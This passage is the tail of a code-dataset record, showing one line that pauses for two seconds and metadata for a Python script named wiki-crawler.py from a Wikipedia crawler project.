time.sleep(2)\n","sub_path":"wikipedia-crawler/wiki-crawler.py","file_name":"wiki-crawler.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}